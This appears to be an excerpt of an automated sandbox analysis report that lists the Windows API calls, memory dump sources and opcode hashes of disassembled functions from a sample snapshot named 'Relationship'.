                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00BFF27B
                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00BFF289
                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BFF29F
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00BFF2B1
                                                                                                                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00C432D8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                            • Opcode ID: d8c9f7ef2f8807839a6be48b29f854922b7dd4520bb747005ed899ecb0e7dbfc
                                                                                                                                                                                                                                                                            • Instruction ID: 574064f92774b6364197f3384fed3bd2fc3a0c0c4b9edb7d64a3d77287d3ceb9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8c9f7ef2f8807839a6be48b29f854922b7dd4520bb747005ed899ecb0e7dbfc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBF05E306043899BEB30CBA0CC89FEA73ACEF84310F104929F21A830D0DB709588DB25
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00C03006
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                            • String ID: CALL
                                                                                                                                                                                                                                                                            • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                            • Opcode ID: 11da11683efd6ee7cad57a2f7cccb102e0330c06da9301180ea50b354ae31256
                                                                                                                                                                                                                                                                            • Instruction ID: 1734a951d2e25051a41b3b3ae4116b784ca493f52922b18ad684a606b049c1e2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11da11683efd6ee7cad57a2f7cccb102e0330c06da9301180ea50b354ae31256
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1922AA706083419FD714DF24C884B2ABBF5BF89314F24895DF4AA8B3A1D771EA85DB42
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 426cac4441aab216020758ee6e2277b0f9f56e4abbadeab155d0766df76e41f5
                                                                                                                                                                                                                                                                            • Instruction ID: b1b19b4ec5f1b7a6e980286420fba0d5e745dcefbcb7506f10b09e095d9d048f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 426cac4441aab216020758ee6e2277b0f9f56e4abbadeab155d0766df76e41f5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF32E370A00215EFCB20DF54C881BAEB7B4FF06314F188559F965AB291DB71EE84EB52
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00C3413B
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF55D1,?,?,00C34B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BF5871
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00BF3A76
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                                            • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                            • Opcode ID: b6f109144af41a896f5609568765ce119b9fa2ff952a994ba3f6944e66671687
                                                                                                                                                                                                                                                                            • Instruction ID: 2a5f2013a8fe46c05efea0150619012eed2e46b8de7eb193f4911a39466886ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6f109144af41a896f5609568765ce119b9fa2ff952a994ba3f6944e66671687
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22218171A0025C9BCF15DF98C845BEE7BF8AF49714F008059EA45B7281DBB49A8D8F61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BF3A3C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                            • Opcode ID: ed872db6e3bf87d7028d7980d3a00f8e5d674cfc5e5266af835d2b52df167ef6
                                                                                                                                                                                                                                                                            • Instruction ID: 6de77e1099c9a97588801baa69f628bef47a52f4971e090f7423730ea9d8edae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed872db6e3bf87d7028d7980d3a00f8e5d674cfc5e5266af835d2b52df167ef6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D23195706047058FD320DF25D884BABBBF8FB49714F00096EEADA87251D7B5AA48CB52
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsThemeActive.UXTHEME ref: 00BF333D
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00BF32FB
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BF3312
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00BF3368,?), ref: 00BF33BB
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00BF3368,?), ref: 00BF33CE
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CC2418,00CC2400,?,?,?,?,?,?,00BF3368,?), ref: 00BF343A
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00CC2418,?,?,?,?,?,?,?,00BF3368,?), ref: 00BF34BB
                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00BF3377
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                            • Opcode ID: 02ad77cf6fb62a977b7161a8791c2c065daa03ea2990735dde8e801d661c04eb
                                                                                                                                                                                                                                                                            • Instruction ID: f18810158a8562c496bb25a0a458f0129a74732e35b829fd2fb0961a3b184483
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02ad77cf6fb62a977b7161a8791c2c065daa03ea2990735dde8e801d661c04eb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2F054725543849FD701AF60FC0AF7C37D8A745B09F084866FA05460F2CBBA41949B44
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 00C0F96C
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFEE50: GetInputState.USER32 ref: 00BFEF07
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00C4FB22
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InputSleepStateTimetime
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4149333218-0
                                                                                                                                                                                                                                                                            • Opcode ID: 49e8728a684c328867f046f374c77fc4f7b46df504d123ecf2728f166d098fb9
                                                                                                                                                                                                                                                                            • Instruction ID: d3a894ba2cdd9447b287d0e76b9d75a2be82fde110396e4c7c13b1d23d6e0037
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49e8728a684c328867f046f374c77fc4f7b46df504d123ecf2728f166d098fb9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F08C3120060A9FD314EF79E519F6AFBE9FF45760F014069F92AC72A0DB70A844CB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandleSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 252777609-0
                                                                                                                                                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                            • Instruction ID: 28c5ad41f5e3e8f734168e921eaf76e08fa58e3519efcce1cf93169f91ae2d94
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6831D574A00105DFC718DF59D480AA9FBA5FB4A300B3486A5E419CB252D7B2EEC1EBC0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00BFCEEE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                            • Opcode ID: cecf26561be001e4e8ad7c97bf2dd11a6a8ac129df6a3dc57570b318d6d06c39
                                                                                                                                                                                                                                                                            • Instruction ID: 27bef3c54b2578186432a9029c12061ecb9b304813fe18e98aa53d67169ef180
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cecf26561be001e4e8ad7c97bf2dd11a6a8ac129df6a3dc57570b318d6d06c39
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06328E74A0024D9FDB10CF58C984ABEBBF5FF44314F1980A9EA55AB251C734AE89DB90
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LoadString
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                            • Opcode ID: d99ddbef359650d545226c9b86aa3738be0bb026cc6df970a72636fbeab2da24
                                                                                                                                                                                                                                                                            • Instruction ID: e4305cae18013111235249042e8fbd56a6f1ecd0f60a8a119681d8488d4aa877
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d99ddbef359650d545226c9b86aa3738be0bb026cc6df970a72636fbeab2da24
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58D12C75A04209EFCB14EF98C481DBDBBB5FF58310F148199E919AB291DB31AE85CF90
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 3ce4ecdcb029de386f2b4d14b774d4c41ddfc7691580c282a2644b7837ade750
                                                                                                                                                                                                                                                                            • Instruction ID: d97a63842370467db669e19587ddc312138e93286468c3b292de672cce68f859
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ce4ecdcb029de386f2b4d14b774d4c41ddfc7691580c282a2644b7837ade750
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1051E935A00118AFDB11DF68C840BE97BA1EF87364F19816CE8199B391D731EE83EB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00C5FCCE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: BuffCharLower
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3610847587a78df8e89b4ad100c3db777998488842bec50024316964aa0279ce
                                                                                                                                                                                                                                                                            • Instruction ID: 5e286107b32de517c5bc0250fcd9013cf717f8460d357c1baa52762020342f57
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3610847587a78df8e89b4ad100c3db777998488842bec50024316964aa0279ce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E41B67A500209AFDB15EF68C8819AEB7F8EF44315B20453EE91697251EB70DF89CB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BF668B,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF664A
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BF665C
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF663E: FreeLibrary.KERNEL32(00000000,?,?,00BF668B,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF666E
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF66AB
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C35657,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF6610
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BF6622
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF6607: FreeLibrary.KERNEL32(00000000,?,?,00C35657,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF6635
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9e945dfccfe9b82a8482beafd7a72f7951dfa2276d6e56b49eb9b44e1d69a028
                                                                                                                                                                                                                                                                            • Instruction ID: 554e79979de9428cc7aaabb9b9727dbdbadc54b2b53cd17d201bdbfda93922a3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e945dfccfe9b82a8482beafd7a72f7951dfa2276d6e56b49eb9b44e1d69a028
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2611C172600209BACB14BB24C842BFD7BE59F50714F20486EFA53E71C2EE719A09EB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
